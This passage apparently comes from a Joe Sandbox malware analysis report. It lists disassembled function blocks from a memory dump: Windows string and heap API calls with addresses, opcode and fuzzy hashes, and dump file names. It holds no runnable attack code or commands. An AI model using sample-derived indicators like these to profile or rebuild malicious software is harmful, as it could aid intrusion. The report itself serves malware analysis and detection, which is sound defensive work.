                        • Instruction ID: d47f61e302941666c898f53d530a655815d0d22f5314777574fcbd7fe2c63682
                        • Opcode Fuzzy Hash: 907ae56a716848e1e47ef047a057777f4c3f00976d4bed02376501d1a14136f2
                        • Instruction Fuzzy Hash: 09F0FCF09016192BFB309B749D49BE67BA8BF14704F044591FB89D7180DBF88DC18B98
                        APIs
                        • __getptd.LIBCMT ref: 00518FDD
                          • Part of subcall function 005187FF: __amsg_exit.LIBCMT ref: 0051880F
                        • __getptd.LIBCMT ref: 00518FF4
                        • __amsg_exit.LIBCMT ref: 00519002
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00519026
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: ddafae0716dcdeadb7657d68095d5e02e2b52c5a6a3f48bdce08979f433f6004
                        • Instruction ID: 00d863ba3227ca78bb2209c1d52e98fe7097b371e66fea0bfdf609992e5ff03a
                        • Opcode Fuzzy Hash: ddafae0716dcdeadb7657d68095d5e02e2b52c5a6a3f48bdce08979f433f6004
                        • Instruction Fuzzy Hash: 61F06232A086159BF670FB7C580E7E92EA07F48720F244119F4446A1D2DF6459C1D655
                        APIs
                        • lstrlen.KERNEL32(------,004F5BEB), ref: 0051731B
                        • lstrcpy.KERNEL32(00000000), ref: 0051733F
                        • lstrcat.KERNEL32(?,------), ref: 00517349
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcatlstrcpylstrlen
                        • String ID: ------
                        • API String ID: 3050337572-882505780
                        • Opcode ID: 5e0325f360d3789dae8008efc4b7b44ca221cf4f2c9d4a562a8c50f89656a2c5
                        • Instruction ID: 8863dd9d6a00e857b1af8a3243c5677bbb66fbefc00db69f114499755b9f486d
                        • Opcode Fuzzy Hash: 5e0325f360d3789dae8008efc4b7b44ca221cf4f2c9d4a562a8c50f89656a2c5
                        • Instruction Fuzzy Hash: EAF0C0745117069FEB649F39D94C927BBF9EF44701718881DA89AC7214E734D881CB14
                        APIs
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00503422
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050344B
                        • lstrcpy.KERNEL32(00000000,?), ref: 00503471
                        • lstrcpy.KERNEL32(00000000,?), ref: 00503497
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: fe4f37b00d2d5ffffcbf3531e5881008c68336e210976d4ccb7fdd2988990ea6
                        • Instruction ID: c40e1b507f596b547bed8045af1f96286980d4bad0d0d3709a523a98add85d27
                        • Opcode Fuzzy Hash: fe4f37b00d2d5ffffcbf3531e5881008c68336e210976d4ccb7fdd2988990ea6
                        • Instruction Fuzzy Hash: A212DB70A112059FDB28CF19C558B29BBE9BF44718B1DC0AEE8099B3E2D776DD42CB44
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00507C94
                        • std::_Xinvalid_argument.LIBCPMT ref: 00507CAF
                          • Part of subcall function 00507D40: std::_Xinvalid_argument.LIBCPMT ref: 00507D58
                          • Part of subcall function 00507D40: std::_Xinvalid_argument.LIBCPMT ref: 00507D76
                          • Part of subcall function 00507D40: std::_Xinvalid_argument.LIBCPMT ref: 00507D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: string too long
                        • API String ID: 909987262-2556327735
                        • Opcode ID: 1d48e15ee362f77db32d9c1f15ba6ffde0fc4a469d01ecceb3de2e3ebfa6e715
                        • Instruction ID: e15247a4757314e1f3aa04dd99d18a6d6c76f7f8467ffa64d8aa6c6cd0affbb8
                        • Opcode Fuzzy Hash: 1d48e15ee362f77db32d9c1f15ba6ffde0fc4a469d01ecceb3de2e3ebfa6e715
                        • Instruction Fuzzy Hash: 0D31E8727086184BF734DE6CE88096EFBE9FF99750B20492AF5418B6C1D771BC4183A4
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,?), ref: 004F6F74
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F6F7B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID: @
                        • API String ID: 1357844191-2766056989
                        • Opcode ID: 6cc6abd02dba4995bec960dddf8c53537d97337db8a3ac9749a87a32fec34526
                        • Instruction ID: 8ee6b3f5db5cbfb0a69f5e6e898d31e924df18b82a92db5ef3f7480c31d65700
                        • Opcode Fuzzy Hash: 6cc6abd02dba4995bec960dddf8c53537d97337db8a3ac9749a87a32fec34526
                        • Instruction Fuzzy Hash: BA218EB06406069BEB209F20DC84BB773E8EB41705F44487DFA46CBA85FB79E945C764
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0051244C
                        • lstrlen.KERNEL32(00000000), ref: 005124E9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00512570
                        • lstrlen.KERNEL32(00000000), ref: 00512577
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 3bb5662b33041e0bc7e83ed39c55667211419a722b86a4caf135b7c5fc48a768
                        • Instruction ID: 511975979e7a24ebac083bda2ccb4bbcd747ef65c537e55db8d09c4ea9d50e9a
                        • Opcode Fuzzy Hash: 3bb5662b33041e0bc7e83ed39c55667211419a722b86a4caf135b7c5fc48a768
                        • Instruction Fuzzy Hash: 1681D670E002099BEF14DF95DC84BEEBBB5BF94300F14846DE508AB281EB759D96CB94
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 005115A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 005115D9
                        • lstrcpy.KERNEL32(00000000,?), ref: 00511611
                        • lstrcpy.KERNEL32(00000000,?), ref: 00511649
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 20720430076b0dc6ac505b66c23749f108fbe65cd94dfc4d9aeae9ce191c4423
                        • Instruction ID: a8322c8cb30d2aaafa27affda2d9dcb226d0709f72378b1efa28e71328f35aa9
                        • Opcode Fuzzy Hash: 20720430076b0dc6ac505b66c23749f108fbe65cd94dfc4d9aeae9ce191c4423
                        • Instruction Fuzzy Hash: 55210AB4601F068BE734DF2AD558A27BBF9BF44700B04491DA58BC7A40DB78E851CF98
                        APIs
                          • Part of subcall function 004F1610: lstrcpy.KERNEL32(00000000), ref: 004F162D
                          • Part of subcall function 004F1610: lstrcpy.KERNEL32(00000000,?), ref: 004F164F
                          • Part of subcall function 004F1610: lstrcpy.KERNEL32(00000000,?), ref: 004F1671
                          • Part of subcall function 004F1610: lstrcpy.KERNEL32(00000000,?), ref: 004F1693
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 8770029d349340c3607b0c51d5a735f831ca93a6fd2195e385ccbca4ce9c75c5
                        • Instruction ID: f385d012b14b98ccbad2137956144d65deae69db89e7d058c1a115944856ff98
                        • Opcode Fuzzy Hash: 8770029d349340c3607b0c51d5a735f831ca93a6fd2195e385ccbca4ce9c75c5
                        • Instruction Fuzzy Hash: 3831B874A11B06EFD724DF3AC544967B7E5BF48305704492EA996C3B20DB78F811CB84
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 004F162D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F164F
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1671
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1693
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: ddd858d2cb4b1c13d9442a08108143b23a49583e9581b8420b2af990a957f93a
                        • Instruction ID: cd73b15521750254d5b8c449792e910c3b1af20a0e0d1db3260740ed0a27bffa
                        • Opcode Fuzzy Hash: ddd858d2cb4b1c13d9442a08108143b23a49583e9581b8420b2af990a957f93a
                        • Instruction Fuzzy Hash: 881151B4A117069BD7249F36D518937B7FCBF44301708452EA98AC3B60EB78E811CB58